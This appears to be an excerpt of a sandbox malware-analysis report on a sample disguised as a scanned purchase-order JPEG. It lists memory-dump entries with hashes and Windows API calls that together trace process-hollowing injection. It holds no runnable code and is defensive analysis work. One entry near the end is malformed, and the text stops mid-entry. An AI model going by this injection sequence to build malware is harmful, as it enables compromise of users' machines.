                                                                                                        Memory Dump Source
• Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 3b3b3390c28d104e59801e99f6dc42ea1cf28e9a0c265368fa702351bed0ccdd
• Instruction ID: 71c3428dc3bcff531db1f770d57324afb2ce861c1988d85d364255919cc70dc1
• Opcode Fuzzy Hash: 3b3b3390c28d104e59801e99f6dc42ea1cf28e9a0c265368fa702351bed0ccdd
• Instruction Fuzzy Hash: 7F2125B1A003599FCB10DFA9C985BDEBBF5FF48310F10842AE958A7250D7B89944CFA4
APIs
• ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0C1C74E8
Memory Dump Source
• Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: cd279c5455a83397a1b7588c851d87ca9586d6f6b4d2427d8979151260f44221
• Instruction ID: de2593c4c96a06a32f5b3a50661ebc2221f5d6ce925c547288b8ebb822c4e280
• Opcode Fuzzy Hash: cd279c5455a83397a1b7588c851d87ca9586d6f6b4d2427d8979151260f44221
• Instruction Fuzzy Hash: DB214AB19002599FCB10DFA9C885AEEFBF5FF88310F10842AE558A7250C7789540CFA4
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0C1C725E
Memory Dump Source
• Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 93c68e0284c47eb1f3696f1de5591350d8d154192cfa67d8ebb694bc73346840
• Instruction ID: 4a82369e8ab8d2e02b565683a6d1c534a460465ce2c5f65c167a564d99e5b15c
• Opcode Fuzzy Hash: 93c68e0284c47eb1f3696f1de5591350d8d154192cfa67d8ebb694bc73346840
• Instruction Fuzzy Hash: 65214CB19002098FDB10DFA9C5857EEFBF4EF98314F14842EE559A7240CB789945CF94
APIs
• ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0C1C74E8
Memory Dump Source
• Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 62bbc14ed007ee4a24fea7f8381334dcdc5c6a66dc5fbec3348121420c993351
• Instruction ID: e5ff721fe628791aa25271707fce3d786fdae21fcb18744e66ad6d3d032586e9
• Opcode Fuzzy Hash: 62bbc14ed007ee4a24fea7f8381334dcdc5c6a66dc5fbec3348121420c993351
• Instruction Fuzzy Hash: AE2128B19002599FCB10DFAAC985AEEFBF5FF48320F10842AE558A7250C7789544CFA4
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0C1C725E
Memory Dump Source
• Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: f0e06ee7cf0148bcffdc38b3cdaf55f59395e2a0d95d757abb27620f6dac47e4
• Instruction ID: 8382da7e84bb3b2cd885dd470d2d71d4646b6bf01919b43be7e6ec63c5452723
• Opcode Fuzzy Hash: f0e06ee7cf0148bcffdc38b3cdaf55f59395e2a0d95d757abb27620f6dac47e4
• Instruction Fuzzy Hash: F12118B19002098FDB10DFAAC5857EEFBF4EF88324F14842EE559A7240CB789945CFA5
APIs
• VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0C1C7326
Memory Dump Source
• Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 011a0888c833e333df7dfc5e74c32f3ad021b8845d6ec2f7f8accfb81140df62
• Instruction ID: bf341450cf722e727f85e8f72183fc6d8d3aa9bc2697e8910634cac290954293
• Opcode Fuzzy Hash: 011a0888c833e333df7dfc5e74c32f3ad021b8845d6ec2f7f8accfb81140df62
• Instruction Fuzzy Hash: 98215C71900249DFCB20DFAAC844ADEBFF5EF88314F108419E555A7250C7759544CFA4
APIs
Memory Dump Source
• Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 42dc0850488307e852712958832395bf45abc4e6adead55e6d371792b6ec044c
• Instruction ID: 64c11bf1e1e817f76938fc2355bd52d9cabaa9ee8232bf952a5cb2d18487fb79
• Opcode Fuzzy Hash: 42dc0850488307e852712958832395bf45abc4e6adead55e6d371792b6ec044c
• Instruction Fuzzy Hash: 2A1146B1D002488FDB20DFAAC4857EEFBF5EF89324F20842AD559A7250C778A945CF94
APIs
• VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0C1C7326
Memory Dump Source
• Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 79dee94faf882faa1cf975745591f80e82271cd615b7961ec4b1be26cb58c2bd
• Instruction ID: a00f929e7c99d80732a2a25086bc81cb7db07fdab4a49191d3c3d5eace1450d4
• Opcode Fuzzy Hash: 79dee94faf882faa1cf975745591f80e82271cd615b7961ec4b1be26cb58c2bd
• Instruction Fuzzy Hash: 591137B19002499FCB20DFAAC845BDEBFF5EF88320F208419E959A7250C779A544CFA4
APIs
Memory Dump Source
• Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: caa5929aea359fc20a16ae01a5a4319c8a29b776c2fa46183e726005c4575c4e
• Instruction ID: e910b9469ced21efac57eeddf323ef7230f8d822d16878a4fe0423e4b92c6e6d
• Opcode Fuzzy Hash: caa5929aea359fc20a16ae01a5a4319c8a29b776c2fa46183e726005c4575c4e
• Instruction Fuzzy Hash: B2113AB19002488FDB20DFAAC4457DEFBF5EF89324F208419D559A7250C779A544CF94
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 0C1CB80D
Memory Dump Source
• Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: 8c205808ce0de8aa1fadea7cb16b4b20325582fcbed3c874d6823094365d7510
• Instruction ID: 618466aa11253d9899b4c4629cbe40d26c65c05f87fa0fb92433e2937dd003f9
• Opcode Fuzzy Hash: 8c205808ce0de8aa1fadea7cb16b4b20325582fcbed3c874d6823094365d7510
• Instruction Fuzzy Hash: 741136B5900348DFCB10DF99C585BDEBBF8EB48320F10841AE914B7200C378A944CFA5
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 0141E27E
Memory Dump Source
• Source File: 00000000.00000002.1731693603.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1410000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: a5b1323c4f5f738ce4eb5ebf33d4a2dbeec76f0a295963b9b45fee852103bec9
• Instruction ID: 79277b7f2897e4948b7fc46a7569e0b9405740c1d1d196c276ba967e3e9934ba
• Opcode Fuzzy Hash: a5b1323c4f5f738ce4eb5ebf33d4a2dbeec76f0a295963b9b45fee852103bec9
• Instruction Fuzzy Hash: 6711DFB5C002498FDB20DF9AD444ADEFBF4EB88324F10842AD959B7210C379A545CFA5
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 0C1CB80D
Memory Dump Source
• Source File: 00000000.00000002.1741023330.000000000C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C1C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c1c0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: 4749a9509b0acb06c6a8a1bd0c756faf456ec1489255dfe6f4ed9f9cc73e4099
• Instruction ID: 8480d18908e64eec3ad78a3cc6a74e33515c45e17f114d95f1018ee4a98b2011
• Opcode Fuzzy Hash: 4749a9509b0acb06c6a8a1bd0c756faf456ec1489255dfe6f4ed9f9cc73e4099
• Instruction Fuzzy Hash: DB11F2B59002499FCB20DF99D585BDEBBF8EB48320F10841AE958A7210C379A984CFA1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID: (bq
• API String ID: 0-149360118
• Opcode ID: 6dc113ac20e996f9959e10d73420a1c9a14c132c40e12c198aecdf98242ed3c5
• Instruction ID: 5e50b08e230a5a722d7b4a7290123055d6273d9393d79799021f6120d038577e
• Opcode Fuzzy Hash: 6dc113ac20e996f9959e10d73420a1c9a14c132c40e12c198aecdf98242ed3c5
• Instruction Fuzzy Hash: 11910370A05209DFCB14DFA9D849AAEBFF6FF89320F10846EE446A7741DB309805CB91
Strings
Memory Dump Source
• Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: ff2f6f69f466e702ab8107295f0187757c2f0e7143b7d9c52877b4b67c68fdd9
• Instruction ID: d2893233eb5d3d4bb0b4fec761c53902a276f23c6e1ba1a8162fb203cbbca4f5
• Opcode Fuzzy Hash: ff2f6f69f466e702ab8107295f0187757c2f0e7143b7d9c52877b4b67c68fdd9
• Instruction Fuzzy Hash: 89D10C35D0120ACFCF14DFA8C4949EDB7B1FF48324B218655D8067725AEB34AA8ACF80
Strings
Memory Dump Source
• Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
• Opcode ID: ce14fbadeda5543f7fa0859ea24fd7d0ff832dbbd20f16e752864caffebebe70
• Instruction ID: 71f5bdc3b5ae49d2e532c873ffde3678546259cb20e2d5bf10e31ab3cb506681
• Opcode Fuzzy Hash: ce14fbadeda5543f7fa0859ea24fd7d0ff832dbbd20f16e752864caffebebe70
• Instruction Fuzzy Hash: F5A1FD3590020ACFCF04DFA8C4849DDB7B1FF58314B218655D806BB259EB30BA8ACF80
Strings
Memory Dump Source
• Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID: Hbq
• API String ID: 0-1245868
• Opcode ID: af04db2d6021e8ee38a1b8858ebb452ea06e351ca07d9c3ad62ba6225ce9e131
• Instruction ID: c5a763e29c772c2a7fef7c91637c4c9eb7952e7967c85773814f43e370356e1f
• Opcode Fuzzy Hash: af04db2d6021e8ee38a1b8858ebb452ea06e351ca07d9c3ad62ba6225ce9e131
• Instruction Fuzzy Hash: 104181B1A00308DFCB14DFA9C485AAEBBF5FF88310F108469E449E7751DB34A945CBA1
Memory Dump Source
• Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7e0b2749eb936621349af2b19b7f5adc85c1622ea50ee08ec1716c228f406201
• Instruction ID: 519720edeaf6a498f866911c7028b6c0adcf177de45417e09847cf838b1b5a9b
• Opcode Fuzzy Hash: 7e0b2749eb936621349af2b19b7f5adc85c1622ea50ee08ec1716c228f406201
• Instruction Fuzzy Hash: 0342D931E106198FCB25DF68C885AEDB7B5FF89310F118699D459BB261EB30AE85CF40
Memory Dump Source
• Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: eaf3fa9c363dbedddf36376f3c089db9f7814e6ff2a55d974471e57cf402c6bf
                                                                                                        • Instruction ID: fa3404f4d9793e735158ff54583085463bd857b166ef370354df553d755c7b8b
                                                                                                        • Opcode Fuzzy Hash: eaf3fa9c363dbedddf36376f3c089db9f7814e6ff2a55d974471e57cf402c6bf
                                                                                                        • Instruction Fuzzy Hash: 6EF12C31E106198FCB25DF68C885AEDB7B6FF49310F1186A9D419BB252EB30AD81CF40
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9c48ca512b8fdfba286b8d6e80ceefb0a5f056da0c9d18f65c145b4993d60608
                                                                                                        • Instruction ID: 66c18c8ba30333e2f67943d581f14e6af4cba67a2397052e45e910598c81a1c8
                                                                                                        • Opcode Fuzzy Hash: 9c48ca512b8fdfba286b8d6e80ceefb0a5f056da0c9d18f65c145b4993d60608
                                                                                                        • Instruction Fuzzy Hash: E191FB7591060ADFCB01DF68C880999FBF5FF59320B14879AE819EB256E770E985CF80
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 64c756ab8dd035e00679c58d34a5a871fff24160d7605369f3afaea79d718a41
                                                                                                        • Instruction ID: 5e0aa2cf02b211b7a63c356be78a4aa67f948e764357828f58f22ae4074c8270
                                                                                                        • Opcode Fuzzy Hash: 64c756ab8dd035e00679c58d34a5a871fff24160d7605369f3afaea79d718a41
                                                                                                        • Instruction Fuzzy Hash: 8871BBB9700A00CFC718DF29C588A59BBF2BF8931471589A9E54ACB772DB72EC45CB50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7941d61f46899234ed27f6c07e9be0eaf297fd57a5780f9f8b1d6162dedf6b72
                                                                                                        • Instruction ID: ccc28cf4df6d8def9a6ec2252d3c4afc7bd025b84f9c05861458d6be1ee15c6d
                                                                                                        • Opcode Fuzzy Hash: 7941d61f46899234ed27f6c07e9be0eaf297fd57a5780f9f8b1d6162dedf6b72
                                                                                                        • Instruction Fuzzy Hash: 3B7190B4A012068FCB44CF69D584999FBF5FF48314B0986A9E80ADB352E734EC85CF90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4c05a1a6fc68b8dba476bc0d19c38a8d411bc6bc15a8004311956d1c5eb2654d
                                                                                                        • Instruction ID: fa0ed2340d26c5c26a3a0c2be84500bd6dc4af43fe202617c72990e1f1b1cf03
                                                                                                        • Opcode Fuzzy Hash: 4c05a1a6fc68b8dba476bc0d19c38a8d411bc6bc15a8004311956d1c5eb2654d
                                                                                                        • Instruction Fuzzy Hash: 39413E34A10709CFCB14EF68C998DADFBB6FF85304F008569E515AB325EB71A945CB81
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: abb15119856e0e0046bf9e7ff20a68f0054314eacbed473c75261bce860599b0
                                                                                                        • Instruction ID: f7e3589e1fe2db5bf635c157d234ee88aba8972d6785527a4296cc0835af854d
                                                                                                        • Opcode Fuzzy Hash: abb15119856e0e0046bf9e7ff20a68f0054314eacbed473c75261bce860599b0
                                                                                                        • Instruction Fuzzy Hash: BE414F35A1070ACFCB04DFA8C958AEDBBB6FF85304F008559E515AB325EB71A946CB81
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5723692ba3ace7008a1f7ae721e250371e05a45a540113e9b92f766c19bd059c
                                                                                                        • Instruction ID: 1e2cd7cb7037b0938f7b94459a947c9f80dc2fd85cc794296cb5baaa02141fde
                                                                                                        • Opcode Fuzzy Hash: 5723692ba3ace7008a1f7ae721e250371e05a45a540113e9b92f766c19bd059c
                                                                                                        • Instruction Fuzzy Hash: A6413D75A04206CFC715CF29C585A99FBF5FF49320B0986A9E80ADB352E730EC85CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 68e9c507bda2973117011d2cdd4c10105914de92496dba5a8f27a9f52863e4b6
                                                                                                        • Instruction ID: 155c6365ef0575349c4ff4aaba245833fe08fa8e8510aad4f8e07324cb97b7e7
                                                                                                        • Opcode Fuzzy Hash: 68e9c507bda2973117011d2cdd4c10105914de92496dba5a8f27a9f52863e4b6
                                                                                                        • Instruction Fuzzy Hash: CD41E775A0020ADFCB44DFA8D9849ADFBB5FF49310B14C659E918AB315E730E985CF90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8e04a4cf8f95ce7ea39895cb577f9fa7d9f89401f0bd90eb0ff427f81c401601
                                                                                                        • Instruction ID: 8c3bf1944e12d70f055535af012f0674b8c37ba90b497ebea347d985da5124eb
                                                                                                        • Opcode Fuzzy Hash: 8e04a4cf8f95ce7ea39895cb577f9fa7d9f89401f0bd90eb0ff427f81c401601
                                                                                                        • Instruction Fuzzy Hash: B531A436B11219DFCF18EF68D8598DDF7B6FF88224B048169E505AB315EB31AD46CB80
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ff295553aa00f1f5c337e0c15f130af886b592830b8658ab4c4d3d6337f9b87a
                                                                                                        • Instruction ID: 1251143dfe3e03b32173f9be4296b2c3a270b39f341014278558222c4e634a67
                                                                                                        • Opcode Fuzzy Hash: ff295553aa00f1f5c337e0c15f130af886b592830b8658ab4c4d3d6337f9b87a
                                                                                                        • Instruction Fuzzy Hash: 1E41E775A0020ADFCB44DFA9D8849AEFBB5FF49310B14C659E918AB315E730E985CF90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 56904af6d7574171fcecbf91c96bfe8490c6b9fe43d70d076859b0f2baf89d8d
                                                                                                        • Instruction ID: 57ff8c720b2b16266501fe80e9977af33841876251ed704144158e56407b2cc9
                                                                                                        • Opcode Fuzzy Hash: 56904af6d7574171fcecbf91c96bfe8490c6b9fe43d70d076859b0f2baf89d8d
                                                                                                        • Instruction Fuzzy Hash: 6A21D3363142108FD7158B2DC9896697BEAFF85320B2984B5E50ADF3A3EE31DC049B90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1731239507.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_13cd000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 00b2b1badc478dda2c89982d831bc38b4b529eef94709166c9ac16343ea72dc6
                                                                                                        • Instruction ID: 1ce20e038d9182e3ece32181b3aeb518bde96800d5677c2985b137413ba4f6fb
                                                                                                        • Opcode Fuzzy Hash: 00b2b1badc478dda2c89982d831bc38b4b529eef94709166c9ac16343ea72dc6
                                                                                                        • Instruction Fuzzy Hash: 7F31847550D3C08FD703CB24C994715BF71AB86618F19C5EED4498F6A3C23A980ACBA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1731163154.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_13bd000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b566b420d119d228a76a5d7686f42d3fe81d923952a89c78650099184458ac95
                                                                                                        • Instruction ID: 616030026428e3e91afa719d19b2322b92b74c4fdb9e2c74d0327a66ffc8a8ee
                                                                                                        • Opcode Fuzzy Hash: b566b420d119d228a76a5d7686f42d3fe81d923952a89c78650099184458ac95
                                                                                                        • Instruction Fuzzy Hash: 33214871500204DFDB05DF48D9C0B96BF65FB8431CF20C569DA091BA56D73AE446C6A1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1731239507.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_13cd000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c78982f4b26ed5164190b781670c4bd258e4a1db9f8bf080cc09a3181075f8e3
                                                                                                        • Instruction ID: d8c9e21925874f72ba72d99aa6b9aa89f9f9427caaf26819953f448aa95a8a48
                                                                                                        • Opcode Fuzzy Hash: c78982f4b26ed5164190b781670c4bd258e4a1db9f8bf080cc09a3181075f8e3
                                                                                                        • Instruction Fuzzy Hash: FB2194755093808FD703CF64C994755BF71EB86618F19C5EED9498B2A3C33A980ACBA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1731239507.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_13cd000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e1d1d4a5cb282aeed992da0e73214f4c7ade7a1033f0f2a34b0414509e1cdc42
                                                                                                        • Instruction ID: a12b66d9fb9727d20cfa87566ce7fc83e2ea3c43506f78d51369c0535b1f99c3
                                                                                                        • Instruction ID: c5fac549dd3ea15a8de39e7b7652a4f60db4246d892e5fceccdbca0c2beb3ed9
                                                                                                        • Opcode Fuzzy Hash: 27f0ab6d33f63a89af78a514320cd6872b159378170104907797f476b6c791df
                                                                                                        • Instruction Fuzzy Hash: B401D675E00609DFCB41EFA8C5859EDBBF0FF48210B11869AE459EB321E7709E54CB81
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1735603830.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5730000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 338d2fc68f7836c3e2fd8b76c397ed103aa7cccb21acdef631250f60170a07f0
                                                                                                        • Instruction ID: 6cd66e90fc17a91cadbba345cfe72c5107b51f20e208082e5fa4420cd38ee4c0
